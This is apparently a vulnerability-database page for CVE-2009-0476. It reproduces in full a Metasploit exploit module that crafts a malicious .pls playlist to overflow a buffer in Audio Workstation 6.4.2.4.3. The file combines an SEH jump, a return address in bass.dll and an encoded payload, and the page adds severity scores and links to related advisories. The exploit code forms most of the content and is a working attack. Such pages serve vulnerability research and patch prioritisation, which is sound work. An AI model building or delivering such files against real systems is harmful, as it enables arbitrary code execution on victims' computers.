Lucene search
Germaya_x, dookieMSF:EXPLOIT-WINDOWS-FILEFORMAT-AUDIO_WKSTN_PLS-HistoryDec 10, 2009 - 8:46 p.m.
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2009-12-1020:46:53
germaya_x, dookie
www.rapid7.com
9
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
0.738
Percentile
98.2%
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
When opening a malicious pls file with the Audio Workstation,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'germaya_x', 'dookie', ],
'References' =>
[
[ 'CVE', '2009-0476' ],
[ 'OSVDB', '55424' ],
[ 'EDB', '10353' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => true,
'AllowWin32SEH' => true
},
'Payload' =>
{
'Space' => 4100,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
],
'Privileged' => false,
'DisclosureDate' => '2009-12-08',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
])
end
def exploit
sploit = rand_text_alpha_upper(1308)
sploit << "\xeb\x16\x90\x90"
sploit << [target.ret].pack('V')
sploit << make_nops(32)
sploit << payload.encoded
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
Related
openvas
openvas
Euphonics Audio Player Buffer Overflow Vulnerability
2009-02-20 00:00:00
MultiMedia Soft Audio Products Buffer Overflow Vulnerability
2009-02-20 00:00:00
Euphonics Audio Player Buffer Overflow Vulnerability
2009-02-20 00:00:00
exploitdb
exploitdb
Audio Workstation 6.4.2.4.3 - '.pls' Local Buffer Overflow (Metasploit)
2009-12-09 00:00:00
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
2009-02-03 00:00:00
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2010-09-25 00:00:00
packetstorm
packetstorm
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
2010-02-05 00:00:00
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
2009-12-31 00:00:00
prion
prion
Stack overflow
2009-02-08 21:30:00
nvd
nvd
CVE-2009-0476
2009-02-08 21:30:09
metasploit
metasploit
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
2010-01-28 19:24:41
checkpoint_advisories
checkpoint_advisories
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow (CVE-2009-0476)
2017-02-13 00:00:00
cvelist
cvelist
CVE-2009-0476
2009-02-08 21:00:00
cve
cve
CVE-2009-0476
2009-02-08 21:30:09
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
0.738
Percentile
98.2%
Related for MSF:EXPLOIT-WINDOWS-FILEFORMAT-AUDIO_WKSTN_PLS-